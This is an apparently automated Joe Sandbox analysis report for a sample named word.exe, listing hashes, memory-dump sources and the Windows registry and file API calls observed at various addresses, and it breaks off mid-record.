                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
                                                          • Instruction ID: dd30d2edeb09ef8142f3126e4ca7f9bb6d977725bfad211a31da1ac854ab15b9
                                                          • Opcode Fuzzy Hash: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
                                                          • Instruction Fuzzy Hash: 29814771E00228CFDF24CFA8C8447ADBBB1FB44305F25816AD416BB281D7389A96DF05
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
                                                          • Instruction ID: 9c7bf14ce72a16f54db54216be52a61449617ebae17e1f3f959b8044aea663dd
                                                          • Opcode Fuzzy Hash: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
                                                          • Instruction Fuzzy Hash: 42816771D00228CBDF24CFA8C8447ADBBB1FB44305F11816EE856BB281D7786A96DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
                                                          • Instruction ID: 46e89f5986d2092b55afe70fa6685d9fa399791e8108fb818b391c00f2395523
                                                          • Opcode Fuzzy Hash: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
                                                          • Instruction Fuzzy Hash: DB7134B1D00228CFDF24CFA8C9547ADBBB1FB48305F15816AE816BB281D7385A96DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
                                                          • Instruction ID: 5e67b4a66f05046138c2ae5a0676b57ce30197662a7df0c6b5261f8fe412ade3
                                                          • Opcode Fuzzy Hash: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
                                                          • Instruction Fuzzy Hash: 22713471E00228CBDF28CFA8C854BADBBB1FB44305F15816ED816BB291D7385A96DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
                                                          • Instruction ID: 362732d661397dfbd4d13a455e5b242d3c248a06ae4e9e58d05d54b49be68c20
                                                          • Opcode Fuzzy Hash: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
                                                          • Instruction Fuzzy Hash: E7714671E00228CBDF28CF98C854BADBBB1FB44305F15816EE816BB291D7386A56DF45
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                                          • WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,?,00000004,00000000,00000000,?,?), ref: 00402FD2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$PointerWrite
                                                          • String ID:
                                                          • API String ID: 539440098-0
                                                          • Opcode ID: b34524b006225fd86995ffc18ec7893ffd6bb3b8ae62ae05747d43261111392a
                                                          • Instruction ID: 299fc1a8812a7dc38163d95f9210b7a7d751e7dd8a0fa05609209fb9265a90e4
                                                          • Opcode Fuzzy Hash: b34524b006225fd86995ffc18ec7893ffd6bb3b8ae62ae05747d43261111392a
                                                          • Instruction Fuzzy Hash: B2314871502259EFDF20DF59DE44A9E3BA8EF043A5F20403AF908E61D0D374DA41EBA9
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,00405E1D,00000000,00000002,?,00000002,?,?,00405E1D,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C01
                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,00405E1D,?,00405E1D), ref: 00405C22
                                                          • RegCloseKey.KERNELBASE(?), ref: 00405C43
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                          • Instruction ID: a34a41eefb499e4b528ee0e15ee2ddc390ed289ee56622bd58176e85d3ab8876
                                                          • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                          • Instruction Fuzzy Hash: 05015A7114520EEFEB228F64EC45AEB3FACEF15358F004036F944A6220D235D964CBA5
                                                          APIs
                                                            • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000421,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsy9448.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseOpenValue
                                                          • String ID:
                                                          • API String ID: 167947723-0
                                                          • Opcode ID: 0bf27dae340eea5e915237078b2308e9c6c5266a737caaa70cede8a9317ecc3d
                                                          • Instruction ID: 09a8887cd5e4729410dcfabe5c46d2a670465c21522258ca6cdcbf1033b2090e
                                                          • Opcode Fuzzy Hash: 0bf27dae340eea5e915237078b2308e9c6c5266a737caaa70cede8a9317ecc3d
                                                          • Instruction Fuzzy Hash: E8F08671904204FFD7119F659D8CEBF7A6CEB40748F10453EF441B62C0D6B95E41966A
                                                          APIs
                                                          • CreateFileA.KERNELBASE(00000000), ref: 100028AB
                                                          • GetLastError.KERNEL32 ref: 100029B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_word.jbxd
                                                          Similarity
                                                          • API ID: CreateErrorFileLast
                                                          • String ID:
                                                          • API String ID: 1214770103-0
                                                          • Opcode ID: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
                                                          • Instruction ID: 2b4501ff186f60f2b29b8b71d76009b37135a14f8b8ad132536a4a21bb517402
                                                          • Opcode Fuzzy Hash: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
                                                          • Instruction Fuzzy Hash: 9E51A4BA908214DFFB14DF60DCC5B5937A8EB443D4F218429EA08E725DDF38A981CB94
                                                          APIs
                                                            • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000421,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                          • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsy9448.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 10ba0a2ded20e0eaacffac804a89d1e59f4dec69291e3d48a6a341987dad6e6f
                                                          • Instruction ID: 0332112a018d0e07836895fa5cafc858bad159e104d866fff78bcbb739cef185
                                                          • Opcode Fuzzy Hash: 10ba0a2ded20e0eaacffac804a89d1e59f4dec69291e3d48a6a341987dad6e6f
                                                          • Instruction Fuzzy Hash: C111C171905205EFDB11DF60CA889BEBBB4EF00344F20843FE442B62C0D2B84A41EB6A
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                                          • Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
                                                          • Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                                          • Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                                                          APIs
                                                            • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000421,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID:
                                                          • API String ID: 849931509-0
                                                          • Opcode ID: 4a9268794865c303a6a77ff665202cafa5f9ded8a04515ed4fa51fe5aaede73d
                                                          • Instruction ID: 2c42072c31bcbbe471fcd7c214f11599c8a5ac898b8b604777345a29c8a948e9
                                                          • Opcode Fuzzy Hash: 4a9268794865c303a6a77ff665202cafa5f9ded8a04515ed4fa51fe5aaede73d
                                                          • Instruction Fuzzy Hash: 65F04F72A04111ABDB51ABB49A8EAAE6268AB40318F14453BF501B61C1DAFC5E01A66E
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: c6481de3b2b51c751ee50e75985596145f399553e3c283b57367eaa578fd6938
                                                          • Instruction ID: 18ac702c75a7039fec00373c4f699ed09bc4c8ec852dd7b5b9a0ef8cb6e9c66a
                                                          • Opcode Fuzzy Hash: c6481de3b2b51c751ee50e75985596145f399553e3c283b57367eaa578fd6938
                                                          • Instruction Fuzzy Hash: 39E0CD72B04110EBCB10BBB45D4A55E3374DF10359B10443BF501F11C1D2B85C40565D
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 00405986
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                          • Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
                                                          • Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                          • Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: wsprintf
                                                          • String ID:
                                                          • API String ID: 2111968516-0
                                                          • Opcode ID: 5ca30871d32c3bef29aa461ff56dd0d1291972abc5c864dbc3376281af39e19a
                                                          • Instruction ID: f0060f760cc0cb7bea83be527089eb0080f75fd7230c997017a3eb13d9afc21a
                                                          • Opcode Fuzzy Hash: 5ca30871d32c3bef29aa461ff56dd0d1291972abc5c864dbc3376281af39e19a
                                                          • Instruction Fuzzy Hash: AE21FB70D05295BEDF229F644E581EEBBB09B05304F64417FE491B63C5D1BC9A81C72D
                                                          APIs
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                                          • Instruction ID: 05d4d75dbd01593bae97f630dbecede8c42f44da552b6d0f9ca4defc7305ba5b
